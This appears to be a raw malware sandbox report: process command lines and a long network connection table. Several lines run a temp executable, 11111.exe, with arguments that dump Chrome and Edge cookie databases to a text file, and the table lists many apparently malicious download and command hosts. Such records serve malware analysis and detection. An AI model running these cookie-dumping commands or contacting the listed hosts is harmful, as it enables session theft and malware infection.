"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffef13646f8,0x7ffef1364708,0x7ffef1364718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4708 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=1294231
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffef13646f8,0x7ffef1364708,0x7ffef1364718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4992 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3004 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
Network
| Country | Destination | Domain | Proto |
| N/A | 52.247.37.26:80 | dmd.metaservices.microsoft.com | tcp |
| N/A | 20.54.89.106:443 | tcp | |
| N/A | 52.152.108.96:443 | fe3cr.delivery.mp.microsoft.com | tcp |
| N/A | 20.54.89.106:443 | tcp | |
| N/A | 20.54.89.106:443 | tcp | |
| N/A | 20.73.194.208:443 | settings-win.data.microsoft.com | tcp |
| N/A | 20.190.160.71:443 | tcp | |
| N/A | 20.73.194.208:443 | settings-win.data.microsoft.com | tcp |
| N/A | 52.242.101.226:443 | slscr.update.microsoft.com | tcp |
| N/A | 20.54.110.119:443 | tsfe.trafficshaping.dsp.mp.microsoft.com | tcp |
| N/A | 37.0.8.235:80 | tcp | |
| N/A | 20.73.194.208:443 | settings-win.data.microsoft.com | tcp |
| N/A | 52.152.108.96:443 | fe3cr.delivery.mp.microsoft.com | tcp |
| N/A | 52.242.101.226:443 | slscr.update.microsoft.com | tcp |
| N/A | 37.0.11.8:80 | tcp | |
| N/A | 95.101.206.92:80 | go.microsoft.com | tcp |
| N/A | 52.247.37.26:80 | dmd.metaservices.microsoft.com | tcp |
| N/A | 172.67.133.215:80 | wfsdragon.ru | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 8.8.8.8:53 | i.spesgrt.com | udp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 8.8.8.8:53 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | udp |
| N/A | 8.8.8.8:53 | privacytoolz123foryou.xyz | udp |
| N/A | 8.8.8.8:53 | hockeybruinsteamshop.com | udp |
| N/A | 104.21.49.131:80 | a.goatagame.com | tcp |
| N/A | 8.8.8.8:53 | 2no.co | udp |
| N/A | 104.21.49.131:80 | a.goatagame.com | tcp |
| N/A | 185.183.96.3:80 | privacytoolz123foryou.xyz | tcp |
| N/A | 104.21.88.226:80 | i.spesgrt.com | tcp |
| N/A | 104.21.49.131:443 | a.goatagame.com | tcp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 88.99.66.31:80 | 2no.co | tcp |
| N/A | 52.219.64.127:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 95.181.163.101:80 | hockeybruinsteamshop.com | tcp |
| N/A | 111.90.156.58:443 | fsstoragecloudservice.com | tcp |
| N/A | 95.181.163.101:80 | hockeybruinsteamshop.com | tcp |
| N/A | 104.21.9.227:443 | bb.goatggame.com | tcp |
| N/A | 52.219.64.127:443 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 104.21.86.82:80 | swretjhwrtj.gq | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 31.31.198.230:80 | u1452023.cp.regruhosting.ru | tcp |
| N/A | 104.21.1.69:443 | one-wedding-film.xyz | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 195.2.78.163:25450 | tcp | |
| N/A | 172.67.75.219:80 | proxycheck.io | tcp |
| N/A | 88.99.66.31:443 | 2no.co | tcp |
| N/A | 88.99.66.31:443 | 2no.co | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 88.99.66.31:443 | 2no.co | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 193.56.146.22:26336 | tcp | |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 52.219.160.30:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 52.219.156.54:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 185.233.185.134:80 | alebastersbastard.com | tcp |
| N/A | 135.148.139.222:1494 | tcp | |
| N/A | 192.210.222.84:80 | 192.210.222.84 | tcp |
| N/A | 172.67.129.55:443 | money4systems4.xyz | tcp |
| N/A | 95.213.224.6:80 | readinglistforaugust2.xyz | tcp |
| N/A | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 186.2.171.3:80 | 186.2.171.3 | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 104.21.17.130:443 | s.lletlee.com | tcp |
| N/A | 95.181.172.100:55640 | tcp | |
| N/A | 172.67.205.30:443 | download-serv-234116.xyz | tcp |
| N/A | 77.83.175.169:11490 | tcp | |
| N/A | 88.99.66.31:443 | 2no.co | tcp |
| N/A | 88.99.66.31:443 | 2no.co | tcp |
| N/A | 179.60.192.36:443 | www.facebook.com | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 77.83.175.169:11490 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 188.124.36.242:25802 | 188.124.36.242 | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 37.0.8.88:44263 | tcp | |
| N/A | 45.14.49.128:5385 | tcp | |
| N/A | 104.26.3.60:443 | ipqualityscore.com | tcp |
| N/A | 5.182.39.145:80 | ingstorage.com | tcp |
| N/A | 5.182.39.145:80 | ingstorage.com | tcp |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 66.29.130.154:80 | perfect-request-smart.com | tcp |
| N/A | 144.202.76.47:443 | www.listincode.com | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 104.26.3.60:443 | ipqualityscore.com | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 52.222.137.124:80 | duzlwewk2uk96.cloudfront.net | tcp |
| N/A | 52.222.137.124:80 | duzlwewk2uk96.cloudfront.net | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 104.21.22.140:443 | download-serv-234116.xyz | tcp |
| N/A | 104.21.1.69:443 | one-wedding-film.xyz | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 104.26.3.60:443 | ipqualityscore.com | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 95.142.37.102:80 | activityhike.com | tcp |
| N/A | 95.142.37.102:443 | activityhike.com | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 144.76.17.137:80 | s3.tebi.io | tcp |
| N/A | 88.99.66.31:443 | 2no.co | tcp |
| N/A | 144.76.17.137:80 | s3.tebi.io | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 72.21.91.29:80 | statuse.digitalcertvalidation.com | tcp |
| N/A | 45.136.151.102:80 | staticimg.youtuuee.com | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 88.99.66.31:443 | 2no.co | tcp |
| N/A | 8.8.8.8:53 | bestinternetstore.xyz | udp |
| N/A | 88.99.66.31:443 | 2no.co | tcp |
| N/A | 45.136.151.102:80 | staticimg.youtuuee.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 172.67.178.16:443 | bestinternetstore.xyz | tcp |
| N/A | 135.181.123.52:12073 | tcp | |
| N/A | 185.4.65.191:1203 | twelveoclock.top | tcp |
| N/A | 195.171.92.116:80 | geo.netsupportsoftware.com | tcp |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 188.124.36.242:25802 | 188.124.36.242 | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 172.67.205.30:443 | download-serv-234116.xyz | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 193.56.146.22:26336 | tcp | |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 162.0.210.44:443 | connectini.net | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 95.181.163.101:80 | hockeybruinsteamshop.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 104.21.49.131:80 | a.goatagame.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 104.21.49.131:80 | a.goatagame.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 52.219.62.7:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 185.183.96.3:80 | privacytoolz123foryou.xyz | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 88.99.66.31:80 | 2no.co | tcp |
| N/A | 104.21.88.226:80 | i.spesgrt.com | tcp |
| N/A | 88.99.66.31:80 | 2no.co | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 104.21.49.131:443 | a.goatagame.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 95.181.163.101:80 | hockeybruinsteamshop.com | tcp |
| N/A | 111.90.156.58:443 | fsstoragecloudservice.com | tcp |
| N/A | 88.99.66.31:443 | 2no.co | tcp |
| N/A | 104.21.9.227:443 | bb.goatggame.com | tcp |
| N/A | 185.233.185.134:80 | alebastersbastard.com | tcp |
| N/A | 192.210.222.84:80 | 192.210.222.84 | tcp |
| N/A | 188.124.36.242:25802 | 188.124.36.242 | tcp |
| N/A | 52.219.62.7:443 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 172.67.75.219:80 | proxycheck.io | tcp |
| N/A | 52.219.64.7:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 52.219.64.7:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 172.67.205.30:443 | download-serv-234116.xyz | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 8.8.8.8:53 | script.googleusercontent.com | udp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 66.29.130.154:80 | perfect-request-smart.com | tcp |
| N/A | 104.21.86.82:80 | swretjhwrtj.gq | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 45.129.236.6:63318 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 104.21.1.69:443 | one-wedding-film.xyz | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 195.2.78.163:25450 | tcp | |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 8.8.8.8:53 | u1452023.cp.regruhosting.ru | udp |
| N/A | 31.31.198.230:80 | u1452023.cp.regruhosting.ru | tcp |
| N/A | 54.208.186.182:443 | paybiz.herokuapp.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| N/A | 162.0.220.187:80 | requestimmersive.com | tcp |
| N/A | 8.8.8.8:53 | dns.google | udp |
| N/A | 8.8.8.8:443 | dns.google | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 8.8.8.8:443 | dns.google | tcp |
| N/A | 8.8.8.8:443 | dns.google | tcp |
| N/A | 8.8.8.8:443 | dns.google | tcp |
| N/A | 94.140.112.12:80 | trecker33442aq.top | tcp |
| N/A | 8.8.8.8:443 | dns.google | tcp |
| N/A | 94.140.112.12:80 | trecker33442aq.top | tcp |
| N/A | 8.8.8.8:443 | dns.google | tcp |
| N/A | 8.8.8.8:443 | dns.google | tcp |
| N/A | 172.67.205.30:443 | download-serv-234116.xyz | tcp |
| N/A | 8.8.8.8:443 | dns.google | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 52.164.226.245:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 95.181.172.100:55640 | tcp | |
| N/A | 51.144.113.175:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 8.8.8.8:443 | dns.google | udp |
| N/A | 8.8.8.8:443 | dns.google | udp |
| N/A | 204.79.197.219:443 | tcp | |
| N/A | 131.253.33.200:443 | tcp | |
| N/A | 93.184.220.29:80 | crl3.digicert.com | tcp |
| N/A | 93.184.220.29:80 | crl3.digicert.com | tcp |
| N/A | 204.79.197.203:443 | ntp.msn.com | tcp |
| N/A | 204.79.197.203:443 | ntp.msn.com | tcp |
| N/A | 23.73.0.135:443 | tcp | |
| N/A | 23.73.0.135:443 | tcp | |
| N/A | 2.22.22.210:443 | tcp | |
| N/A | 204.79.197.200:443 | tcp | |
| N/A | 13.32.240.78:443 | tcp | |
| N/A | 52.142.114.2:443 | tcp | |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 93.184.220.29:80 | crl3.digicert.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 23.97.153.169:443 | smartscreen-prod.microsoft.com | tcp |
| N/A | 172.67.129.55:443 | money4systems4.xyz | tcp |
| N/A | 93.184.220.29:80 | crl3.digicert.com | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 135.148.139.222:1494 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 193.56.146.22:26336 | tcp | |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 45.14.49.128:5385 | tcp | |
| N/A | 188.124.36.242:25802 | 188.124.36.242 | tcp |
| N/A | 2.22.22.217:443 | tcp | |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 40.126.31.141:443 | tcp | |
| N/A | 77.83.175.169:11490 | tcp | |
| N/A | 81.16.141.221:8888 | 81.16.141.221 | tcp |
| N/A | 158.69.65.151:80 | geoiptool.com | tcp |
| N/A | 172.67.205.30:443 | download-serv-234116.xyz | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 162.0.210.44:443 | connectini.net | tcp |
| N/A | 8.8.8.8:53 | dns.google | udp |
| N/A | 158.69.65.151:443 | www.geodatatool.com | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 8.8.8.8:53 | dns.google | udp |
| N/A | 52.164.226.245:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 23.73.0.135:443 | tcp | |
| N/A | 77.83.175.169:11490 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 81.16.141.221:8888 | 81.16.141.221 | tcp |
| N/A | 31.31.198.230:80 | u1452023.cp.regruhosting.ru | tcp |
| N/A | 172.217.19.196:80 | www.google.com | tcp |
| N/A | 188.124.36.242:25802 | 188.124.36.242 | tcp |
| N/A | 23.73.0.144:443 | tcp | |
| N/A | 8.8.8.8:443 | dns.google | udp |
| N/A | 204.79.197.219:443 | tcp | |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 23.217.250.58:80 | go.microsoft.com | tcp |
| N/A | 20.189.118.208:80 | dmd.metaservices.microsoft.com | tcp |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 162.0.210.44:443 | connectini.net | tcp |
| N/A | 158.69.65.151:80 | www.geodatatool.com | tcp |
| N/A | 74.114.154.22:443 | eduarroma.tumblr.com | tcp |
| N/A | 158.69.65.151:443 | www.geodatatool.com | tcp |
| N/A | 20.82.209.183:443 | tcp | |
| N/A | 93.184.220.29:80 | crl3.digicert.com | tcp |
| N/A | 93.184.220.29:80 | crl3.digicert.com | tcp |
| N/A | 104.16.202.237:443 | www.mediafire.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 20.189.173.21:443 | nw-umwatson.events.data.microsoft.com | tcp |
| N/A | 74.114.154.22:443 | eduarroma.tumblr.com | tcp |
| N/A | 205.196.123.76:443 | download1388.mediafire.com | tcp |
| N/A | 188.34.200.103:80 | 188.34.200.103 | tcp |
| N/A | 162.0.220.187:80 | requestimmersive.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 194.145.227.159:80 | 194.145.227.159 | tcp |
| N/A | 172.67.148.61:443 | source3.boys4dayz.com | tcp |
| N/A | 204.79.197.200:443 | www.bing.com | tcp |
| N/A | 192.243.59.20:443 | tcp | |
| N/A | 192.243.59.20:443 | tcp | |
| N/A | 52.178.182.73:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 52.45.132.150:443 | tcp | |
| N/A | 91.142.79.35:61437 | tcp | |
| N/A | 2.22.22.136:443 | tcp | |
| N/A | 3.86.130.101:443 | tcp | |
| N/A | 52.178.182.73:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 104.22.65.104:443 | tcp | |
| N/A | 188.124.36.242:25802 | 188.124.36.242 | tcp |
| N/A | 172.67.171.54:80 | cache.uutww77.com | tcp |
| N/A | 104.26.7.228:443 | tcp | |
| N/A | 104.26.6.228:443 | tcp | |
| N/A | 8.8.8.8:53 | dns.google | udp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 104.21.49.131:443 | a.goatagame.com | tcp |
| N/A | 93.184.220.29:80 | crl3.digicert.com | tcp |
| N/A | 104.21.9.227:443 | bb.goatggame.com | tcp |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 188.124.36.242:25802 | 188.124.36.242 | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 2.22.22.145:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 88.99.66.31:80 | iplogger.org | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 172.67.146.70:443 | a.goatgame.co | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 8.8.8.8:53 | dns.google | udp |
| N/A | 8.8.8.8:53 | dns.google | udp |
| N/A | 98.126.176.53:443 | vpn.maskvpn.org | tcp |
| N/A | 8.8.8.8:443 | dns.google | udp |
| N/A | 204.79.197.203:443 | ntp.msn.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 98.126.13.146:436 | tcp | |
| N/A | 104.21.7.179:443 | mybrowserinfo.com | tcp |
| N/A | 98.126.176.51:443 | user.maskvpn.org | tcp |
| N/A | 98.126.176.51:443 | user.maskvpn.org | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
